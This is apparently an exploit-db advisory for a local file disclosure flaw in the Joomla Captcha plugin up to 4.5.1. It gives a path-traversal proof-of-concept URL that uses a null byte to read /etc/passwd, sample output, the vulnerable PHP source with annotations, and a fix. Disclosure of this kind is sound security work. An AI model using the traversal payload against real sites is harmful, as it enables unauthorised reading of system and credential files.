Joomla! Plugin Captcha 4.5.1 – Local File Disclosure

  • 作者: dun
    日期: 2011-01-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15958/
  • :::::::-. ...::::::.:::.
     ;;, `';, ;; ;;;`;;;;,`;;;
     `[[ [[[[' [[[[[[[[. '[[
    $$,$$$$$$$$$$ "Y$c$$
    888_,o8P'88.d888888Y88
    MMMMP"` "YmmMMMM""MMM YM
     
     [ Discovered by dun \ posdub[at]gmail.com ]
    
     #############################################################################
     #[ Joomla Captcha Plugin <= 4.5.1 ] Local File Disclosure Vulnerability #
     #############################################################################
     #
     # Script: "Joomla Captcha plugin and patch for Joomla!"
     #
     # Script site: http://www.kupala.net/
     # Download: http://code.google.com/p/joomla15captcha/
     #
     # 
     # [LFI] (arbitrary file read, not include; requires magic_quotes_gpc = Off so the %00 in lng reaches the filesystem
     #        calls unescaped and truncates the '.mp3' suffix appended at line 96 — PHP 5.3.4 and later reject NUL bytes
     #        in paths, which blocks this truncation)
     # Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
     # dun@radius ~ $ cat joomlacaptcha.mp3
     # root:x:0:0:root:/root:/bin/bash
     # ......
     # 
     # File: ./plugins/system/captcha/playcode.php
     # 
     # 79	if (!$captchacode) $captchacode = '0000000000';									
     # 80	
     # 81	session_write_close();
     # 82	
     # 83	@$lng = $_GET['lng']; // [1]
     # 84	if ( !$lng ) $lng = 'en-gb';
     # 85	
     # 86	$captchafilename = "joomlacaptcha.mp3";
     # 87	$captchalength = strlen( $captchacode );
     # 88	
     # 89	$outlength = 0;
     # 90	$reallength = 0;
     # 91	$currsize = 0;
     # 92	$outstream = '';
     # 93	
     # 94	if ($captchalength > 0) {
     # 95		for ($i = 0; $i < $captchalength; $i++) {
     # 96			$soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3'; // [2]
     # 97		}
     # 98		foreach ($soundfiles as $onefile){ // 
     # 99			if (file_exists( $onefile )) { // 
     #100				$instream = fopen( $onefile, 'rb' ); // 
     #101				$currsize = filesize( $onefile );// [3]
     #102				$outstream .= fread( $instream, $currsize ); // 
     #103				$outlength += $currsize; // 
     #104				fclose( $instream ); // 
     #105				$reallength += 1;// 
     #106			}
     #107		}
     #108	}
     #109	
     #110	if (($outstream == '') || ($captchalength != $reallength)) {
     #111			$outstream = 0; $outlength = 1;
     #112	}
     #113	
     #114	ob_start();
     #115	header( 'Content-Type: audio/x-mpeg'); //
     #116	header( "Content-Disposition: attachment; filename=$captchafilename;");//
     #117	header( 'Content-Transfer-Encoding: binary');//
     #118	header( 'Content-Length: '.$outlength);//
     #119	echo $outstream ;// [4] LFD
     #120	ob_end_flush();
     # [1] $lng is read from the request with no validation; [2] it is concatenated into a filesystem path whose
     # appended '.mp3' suffix is cut off by the %00; [3] the resulting file is opened and read; [4] its contents are
     # echoed back to the client as the "audio" response.
     # Fix: before line 96, validate $lng against the set of installed language codes (or reject anything that is
     # not a plain language tag) rather than accepting an arbitrary path fragment.
     # 
     # [ dun / 2011-01-09 ]